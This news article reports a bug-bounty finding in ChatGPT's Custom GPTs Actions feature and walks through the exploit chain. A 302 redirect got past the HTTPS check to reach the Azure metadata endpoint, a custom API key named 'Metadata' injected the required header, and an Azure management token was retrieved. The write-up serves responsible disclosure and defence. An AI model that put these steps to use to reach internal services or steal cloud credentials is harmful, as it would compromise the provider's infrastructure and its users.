Hackers Exploit SSRF Flaw in Custom GPTs to Steal ChatGPT Secrets

Hackers Exploit SSRF Flaw in Custom GPTs to Steal ChatGPT Secrets

A cybersecurity researcher has uncovered a server-side request forgery (SSRF) vulnerability in OpenAI’s ChatGPT.

The flaw, hidden in the Custom GPTs feature, allowed attackers to potentially access sensitive cloud infrastructure secrets, including Azure management API tokens.

Disclosed through OpenAI’s bug bounty program, the issue was swiftly patched, but it underscores the persistent dangers of SSRF in cloud-based AI services.

Attack FlowAttack Flow
Attack Flow

While building a custom GPT, a premium ChatGPT Plus tool for creating tailored AI assistants, the researcher noticed the “Actions” section.

This feature lets users define external APIs via OpenAPI schemas, enabling the GPT to fetch data from user-specified URLs and incorporate it into responses. Examples include querying weather APIs for location-based info.

However, the ability to provide arbitrary URLs triggered the researcher’s “hacker instinct,” prompting a probe for an SSRF vulnerability.

SSRF occurs when an application unwittingly forwards user-supplied requests to unintended destinations, often internal networks or cloud metadata endpoints.

Ranked in the OWASP Top 10 since 2021, SSRF exploits the server’s privileged access that attackers do not have direct access to.

Impacts range from data exfiltration in “full-read” variants, where responses are returned to the attacker, to “blind” SSRF, which enables port scanning or service interactions via timing differences.

In cloud setups like Azure, AWS, or GCP, SSRF can escalate dramatically by targeting instance metadata services (IMDS), accessible only locally at endpoints like http://169.254.169.254.

Secret Key LeakedSecret Key Leaked
Secret Key Leaked

These hold critical details: instance IDs, network configs, and temporary credentials for broader API access.

The researcher targeted ChatGPT’s Azure-hosted backend. Initial attempts to point the API URL to the IMDS failed; the system enforced HTTPS, blocking the HTTP-only metadata endpoint.

Undeterred, they employed a classic bypass: a 302 redirect. Using a tool akin to Burp Collaborator, the researcher hosted an HTTPS endpoint that redirected to the internal IMDS URL.

When tested via the GPT’s “Test” button, ChatGPT followed the redirect and fetched metadata, but only partially. Azure requires a “Metadata: True” header for access, but it was absent, resulting in an error.

Further execution revealed a workaround in the authentication settings. By naming a custom API key “Metadata” and setting its value to “True,” the header was injected into the request. Success: The GPT returned IMDS data.

Escalating, the researcher requested an OAuth2 token for Azure’s management API (resource: https://management.azure.com/, API version: 2025-04-07).

The response included a valid token, granting potential control over ChatGPT’s cloud resources, such as spinning up instances or querying storage.

Reported immediately to OpenAI via Bugcrowd, the vulnerability earned high-severity status, not as damaging as past exploits such as remote code execution on hundreds of EC2 instances, but severe enough to expose infrastructure secrets.

OpenAI patched it rapidly, likely tightening URL validation, redirect handling, and header controls.

This incident highlights AI’s dual-edged sword: innovative features like Custom GPTs boost utility but expand attack surfaces.

As cloud adoption surges, developers must prioritize mitigations against SSRF, such as IP whitelisting and protocol enforcement. For users, it reinforces vigilance, even though “helpful” AI can be a vector for compromise.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and set GBH as a Preferred Source in Google.



Source link